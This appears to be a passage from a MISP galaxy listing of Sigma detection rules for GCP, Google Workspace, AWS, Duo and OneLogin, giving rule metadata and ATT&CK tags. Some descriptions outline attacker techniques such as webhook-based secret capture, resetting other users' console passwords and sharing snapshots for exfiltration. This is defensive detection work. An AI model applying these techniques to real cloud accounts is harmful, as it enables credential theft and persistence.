falsepositive ['Unknown']
filename gcp_dns_zone_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Kubernetes Secrets Modified or Deleted

Identifies when the Secrets are Modified or Deleted.

Internal MISP references

UUID 2f0bae2d-bf20-4465-be86-1311addebaa3 which can be used as unique global reference for Google Cloud Kubernetes Secrets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/09
falsepositive ['Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_secrets_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.credential_access']

Google Cloud SQL Database Modified or Deleted

Detect when a Cloud SQL DB has been modified or deleted.

Internal MISP references

UUID f346bbd5-2c4e-4789-a221-72de7685090d which can be used as unique global reference for Google Cloud SQL Database Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/15
falsepositive ['SQL Database being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_sql_database_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Service Account Modified

Identifies when a service account is modified in Google Cloud.

Internal MISP references

UUID 6b67c12e-5e40-47c6-b3b0-1e6b571184cc which can be used as unique global reference for Google Cloud Service Account Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_service_account_modified.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Kubernetes RoleBinding

Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.

Internal MISP references

UUID 0322d9f2-289a-47c2-b5e1-b63c90901a3e which can be used as unique global reference for Google Cloud Kubernetes RoleBinding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/09
falsepositive ['RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_rolebinding.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.credential_access']

Google Cloud Storage Buckets Enumeration

Detects when storage bucket is enumerated in Google Cloud.

Internal MISP references

UUID e2feb918-4e77-4608-9697-990a1aaf74c3 which can be used as unique global reference for Google Cloud Storage Buckets Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_bucket_enumeration.yml
level low
logsource.category No established category
logsource.product gcp
tags ['attack.discovery']

GCP Break-glass Container Workload Deployed

Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.

Internal MISP references

UUID 76737c19-66ee-4c07-b65a-a03301d1573d which can be used as unique global reference for GCP Break-glass Container Workload Deployed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Unknown']
filename gcp_breakglass_container_workload_deployed.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.defense_evasion', 'attack.t1548']
Related clusters

To see the related clusters, click here.

Google Cloud Kubernetes CronJob

Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. An Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.

Internal MISP references

UUID cd3a808c-c7b7-4c50-a2f3-f4cfcd436435 which can be used as unique global reference for Google Cloud Kubernetes CronJob in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/22
falsepositive ['Google Cloud Kubernetes CronJob/Job may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_cronjob.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.execution']

Google Cloud VPN Tunnel Modified or Deleted

Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.

Internal MISP references

UUID 99980a85-3a61-43d3-ac0f-b68d6b4797b1 which can be used as unique global reference for Google Cloud VPN Tunnel Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['VPN Tunnel being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_vpn_tunnel_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Cloud Firewall Modified or Deleted

Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).

Internal MISP references

UUID fe513c69-734c-4d4a-8548-ac5f609be82b which can be used as unique global reference for Google Cloud Firewall Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/13
falsepositive ['Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.', 'Exceptions can be added to this rule to filter expected behavior.']
filename gcp_firewall_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Google Cloud Re-identifies Sensitive Information

Identifies when sensitive information is re-identified in google Cloud.

Internal MISP references

UUID 234f9f48-904b-4736-a34c-55d23919e4b7 which can be used as unique global reference for Google Cloud Re-identifies Sensitive Information in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename gcp_dlp_re_identifies_sensitive_information.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact', 'attack.t1565']
Related clusters

To see the related clusters, click here.

Google Cloud Kubernetes Admission Controller

Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster. For example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials. An adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.

Internal MISP references

UUID 6ad91e31-53df-4826-bd27-0166171c8040 which can be used as unique global reference for Google Cloud Kubernetes Admission Controller in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Google Cloud Kubernetes Admission Controller may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_kubernetes_admission_controller.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1078', 'attack.credential_access', 'attack.t1552', 'attack.t1552.007']
Related clusters

To see the related clusters, click here.

Google Cloud Service Account Disabled or Deleted

Identifies when a service account is disabled or deleted in Google Cloud.

Internal MISP references

UUID 13f81a90-a69c-4fab-8f07-b5bb55416a9f which can be used as unique global reference for Google Cloud Service Account Disabled or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_service_account_disabled_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Google Cloud Storage Buckets Modified or Deleted

Detects when storage bucket is modified or deleted in Google Cloud.

Internal MISP references

UUID 4d9f2ee2-c903-48ab-b9c1-8c0f474913d0 which can be used as unique global reference for Google Cloud Storage Buckets Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/14
falsepositive ['Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_bucket_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Full Network Traffic Packet Capture

Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.

Internal MISP references

UUID 980a7598-1e7f-4962-9372-2d754c930d0e which can be used as unique global reference for Google Full Network Traffic Packet Capture in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/13
falsepositive ['Full Network Packet Capture may be done by a system or network administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename gcp_full_network_traffic_packet_capture.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.collection', 'attack.t1074']
Related clusters

To see the related clusters, click here.

GCP Access Policy Deleted

Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.

Internal MISP references

UUID 32438676-1dba-4ac7-bf69-b86cba995e05 which can be used as unique global reference for GCP Access Policy Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Legitimate administrative activities']
filename gcp_access_policy_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace Role Privilege Deleted

Detects when an a role privilege is deleted in Google Workspace.

Internal MISP references

UUID bf638ef7-4d2d-44bb-a1dc-a238252e6267 which can be used as unique global reference for Google Workspace Role Privilege Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/24
falsepositive ['Unknown']
filename gcp_gworkspace_role_privilege_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace MFA Disabled

Detects when multi-factor authentication (MFA) is disabled.

Internal MISP references

UUID 780601d1-6376-4f2a-884e-b8d45599f78c which can be used as unique global reference for Google Workspace MFA Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/26
falsepositive ['MFA may be disabled and performed by a system administrator.']
filename gcp_gworkspace_mfa_disabled.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace Application Access Level Modified

Detects when an access level is changed for a Google workspace application. An access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google workspace resources.

Internal MISP references

UUID 22f2fb54-5312-435d-852f-7c74f81684ca which can be used as unique global reference for Google Workspace Application Access Level Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bryan Lim
creation_date 2024/01/12
falsepositive ['Legitimate administrative activities changing the access levels for an application']
filename gcp_gworkspace_application_access_levels_modified.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Google Workspace Application Removed

Detects when an an application is removed from Google Workspace.

Internal MISP references

UUID ee2803f0-71c8-4831-b48b-a1fc57601ee4 which can be used as unique global reference for Google Workspace Application Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/26
falsepositive ['Application being removed may be performed by a System Administrator.']
filename gcp_gworkspace_application_removed.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Google Workspace Granted Domain API Access

Detects when an API access service account is granted domain authority.

Internal MISP references

UUID 04e2a23a-9b29-4a5c-be3a-3542e3f982ba which can be used as unique global reference for Google Workspace Granted Domain API Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/23
falsepositive ['Unknown']
filename gcp_gworkspace_granted_domain_api_access.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace User Granted Admin Privileges

Detects when an Google Workspace user is granted admin privileges.

Internal MISP references

UUID 2d1b83e4-17c6-4896-a37b-29140b40a788 which can be used as unique global reference for Google Workspace User Granted Admin Privileges in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/23
falsepositive ['Google Workspace admin role privileges, may be modified by system administrators.']
filename gcp_gworkspace_user_granted_admin_privileges.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Google Workspace Role Modified or Deleted

Detects when an a role is modified or deleted in Google Workspace.

Internal MISP references

UUID 6aef64e3-60c6-4782-8db3-8448759c714e which can be used as unique global reference for Google Workspace Role Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/24
falsepositive ['Unknown']
filename gcp_gworkspace_role_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product gcp
tags ['attack.impact']

Cisco Duo Successful MFA Authentication Via Bypass Code

Detects when a successful MFA authentication occurs due to the use of a bypass code. A bypass code is a temporary passcode created by an administrator for a specific user to access a Duo-protected application. These are generally used as "backup codes," so that enrolled users who are having problems with their mobile devices (e.g., mobile service is disrupted, the device is lost or stolen, etc.) or who temporarily can't use their enrolled devices (on a plane without mobile data services) can still access their Duo-protected systems.

Internal MISP references

UUID 6f7e1c10-2dc9-4312-adb6-9574ff09a5c8 which can be used as unique global reference for Cisco Duo Successful MFA Authentication Via Bypass Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Khalimonenkov
creation_date 2024/04/17
falsepositive ['Legitimate user that was assigned on purpose to a bypass group']
filename cisco_duo_mfa_bypass_via_bypass_code.yml
level medium
logsource.category No established category
logsource.product cisco
tags ['attack.credential_access', 'attack.defense_evasion', 'attack.initial_access']

OneLogin User Assumed Another User

Detects when an user assumed another user account.

Internal MISP references

UUID 62fff148-278d-497e-8ecd-ad6083231a35 which can be used as unique global reference for OneLogin User Assumed Another User in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['Unknown']
filename onelogin_assumed_another_user.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

OneLogin User Account Locked

Detects when an user account is locked or suspended.

Internal MISP references

UUID a717c561-d117-437e-b2d9-0118a7035d01 which can be used as unique global reference for OneLogin User Account Locked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/10/12
falsepositive ['System may lock or suspend user accounts.']
filename onelogin_user_account_locked.yml
level low
logsource.category No established category
logsource.product onelogin
tags ['attack.impact']

AWS S3 Data Management Tampering

Detects when a user tampers with S3 data management in Amazon Web Services.

Internal MISP references

UUID 78b3756a-7804-4ef7-8555-7b9024a02e2d which can be used as unique global reference for AWS S3 Data Management Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_s3_data_management_tampering.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1537']
Related clusters

To see the related clusters, click here.

AWS EC2 Disable EBS Encryption

Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.

Internal MISP references

UUID 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 which can be used as unique global reference for AWS EC2 Disable EBS Encryption in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/29
falsepositive ['System Administrator Activities', 'DEV, UAT, SAT environment. You should apply this rule with PROD account only.']
filename aws_ec2_disable_encryption.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1486', 'attack.t1565']
Related clusters

To see the related clusters, click here.

AWS IAM Backdoor Users Keys

Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org.

Internal MISP references

UUID 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 which can be used as unique global reference for AWS IAM Backdoor Users Keys in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)', 'AWS API keys legitimate exchange workflows']
filename aws_iam_backdoor_users_keys.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

AWS SecurityHub Findings Evasion

Detects the modification of the findings on SecurityHub.

Internal MISP references

UUID a607e1fe-74bf-4440-a3ec-b059b9103157 which can be used as unique global reference for AWS SecurityHub Findings Evasion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sittikorn S
creation_date 2021/06/28
falsepositive ['System or Network administrator behaviors', 'DEV, UAT, SAT environment. You should apply this rule with PROD environment only.']
filename aws_securityhub_finding_evasion.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

SES Identity Has Been Deleted

Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities

Internal MISP references

UUID 20f754db-d025-4a8f-9d74-e0037e999a9a which can be used as unique global reference for SES Identity Has Been Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2022/12/13
falsepositive ['Unknown']
filename aws_delete_identity.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

AWS Snapshot Backup Exfiltration

Detects the modification of an EC2 snapshot's permissions to enable access from another account

Internal MISP references

UUID abae8fec-57bd-4f87-aff6-6e3db989843d which can be used as unique global reference for AWS Snapshot Backup Exfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Darin Smith
creation_date 2021/05/17
falsepositive ["Valid change to a snapshot's permissions"]
filename aws_snapshot_backup_exfiltration.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1537']
Related clusters

To see the related clusters, click here.

AWS EFS Fileshare Mount Modified or Deleted

Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.

Internal MISP references

UUID 6a7ba45c-63d8-473e-9736-2eaabff79964 which can be used as unique global reference for AWS EFS Fileshare Mount Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/15
falsepositive ['Unknown']
filename aws_efs_fileshare_mount_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

AWS Route 53 Domain Transferred to Another Account

Detects when a request has been made to transfer a Route 53 domain to another AWS account.

Internal MISP references

UUID b056de1a-6e6e-4e40-a67e-97c9808cf41b which can be used as unique global reference for AWS Route 53 Domain Transferred to Another Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Elastic, Austin Songer @austinsonger
creation_date 2021/07/22
falsepositive ['A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_route_53_domain_transferred_to_another_account.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.credential_access', 'attack.t1098']
Related clusters

To see the related clusters, click here.

AWS STS AssumeRole Misuse

Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.

Internal MISP references

UUID 905d389b-b853-46d0-9d3d-dea0d3a3cd49 which can be used as unique global reference for AWS STS AssumeRole Misuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.', 'Automated processes that uses Terraform may lead to false positives.']
filename aws_sts_assumerole_misuse.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1548', 'attack.t1550', 'attack.t1550.001']
Related clusters

To see the related clusters, click here.

AWS RDS Master Password Change

Detects the change of database master password. It may be a part of data exfiltration.

Internal MISP references

UUID 8a63cdd4-6207-414a-85bc-7e032bd3c1a2 which can be used as unique global reference for AWS RDS Master Password Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Benign changes to a db instance']
filename aws_rds_change_master_password.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

AWS ElastiCache Security Group Modified or Deleted

Identifies when an ElastiCache security group has been modified or deleted.

Internal MISP references

UUID 7c797da2-9cf2-4523-ba64-33b06339f0cc which can be used as unique global reference for AWS ElastiCache Security Group Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_elasticache_security_group_modified_or_deleted.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

AWS Suspicious SAML Activity

Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.

Internal MISP references

UUID f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e which can be used as unique global reference for AWS Suspicious SAML Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/22
falsepositive ['Automated processes that uses Terraform may lead to false positives.', 'SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_susp_saml_activity.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.initial_access', 'attack.t1078', 'attack.lateral_movement', 'attack.t1548', 'attack.privilege_escalation', 'attack.t1550', 'attack.t1550.001']
Related clusters

To see the related clusters, click here.

AWS EKS Cluster Created or Deleted

Identifies when an EKS cluster is created or deleted.

Internal MISP references

UUID 33d50d03-20ec-4b74-a74e-1e65a38af1c0 which can be used as unique global reference for AWS EKS Cluster Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['EKS Cluster being created or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename aws_eks_cluster_created_or_deleted.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Restore Public AWS RDS Instance

Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.

Internal MISP references

UUID c3f265c7-ff03-4056-8ab2-d486227b4599 which can be used as unique global reference for Restore Public AWS RDS Instance in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Unknown']
filename aws_rds_public_db_restore.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

AWS IAM S3Browser Templated S3 Bucket Policy Creation

Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".

Internal MISP references

UUID db014773-7375-4f4e-b83b-133337c0ffee which can be used as unique global reference for AWS IAM S3Browser Templated S3 Bucket Policy Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author daniel.bohannon@permiso.io (@danielhbohannon)
creation_date 2023/05/17
falsepositive ['Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value']
filename aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.t1059.009', 'attack.persistence', 'attack.t1078.004']
Related clusters

To see the related clusters, click here.

AWS CloudTrail Important Change

Detects disabling, deleting and updating of a Trail

Internal MISP references

UUID 4db60cc0-36fb-42b7-9b58-a5b53019fb74 which can be used as unique global reference for AWS CloudTrail Important Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author vitaliy0x1
creation_date 2020/01/21
falsepositive ['Valid change in a Trail']
filename aws_cloudtrail_disable_logging.yml
level medium
logsource.category No established category
logsource.product aws
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

AWS EC2 Startup Shell Script Change

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

Internal MISP references

UUID 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df which can be used as unique global reference for AWS EC2 Startup Shell Script Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author faloker
creation_date 2020/02/12
falsepositive ['Valid changes to the startup script']
filename aws_ec2_startup_script_change.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.execution', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.004']
Related clusters

To see the related clusters, click here.

Potential Bucket Enumeration on AWS

Looks for potential enumeration of AWS buckets via ListBuckets.

Internal MISP references

UUID f305fd62-beca-47da-ad95-7690a0620084 which can be used as unique global reference for Potential Bucket Enumeration on AWS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io
creation_date 2023/01/06
falsepositive ['Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity.']
filename aws_enum_buckets.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.discovery', 'attack.t1580']
Related clusters

To see the related clusters, click here.

AWS User Login Profile Was Modified

An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup. With this alert, it is used to detect anyone is changing password on behalf of other users.

Internal MISP references

UUID 055fb148-60f8-462d-ad16-26926ce050f1 which can be used as unique global reference for AWS User Login Profile Was Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author toffeebr33k
creation_date 2021/08/09
falsepositive ['Legit User Account Administration']
filename aws_update_login_profile.yml
level high
logsource.category No established category
logsource.product aws
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

AWS EC2 VM Export Failure

An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.

Internal MISP references

UUID 54b9a76a-3c71-4673-b4b3-2edb4566ea7b which can be used as unique global reference for AWS EC2 VM Export Failure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Diogo Braz
creation_date 2020/04/16
falsepositive No established falsepositives
filename aws_ec2_vm_export_failure.yml
level low
logsource.category No established category
logsource.product aws
tags ['attack.collection', 'attack.t1005', 'attack.exfiltration', 'attack.t1537']
Related clusters

To see the related clusters, click here.

AWS Identity Center Identity Provider Change

Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.

Internal MISP references

UUID d3adb3ef-b7e7-4003-9092-1924c797db35 which can be used as unique global reference for AWS Identity Center Identity Provider Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McIntyre @wtfender
creation_date 2023/09/27
falsepositive ["Authorized changes to the AWS account's identity provider"]
filename aws_sso_idp_change.yml
level high
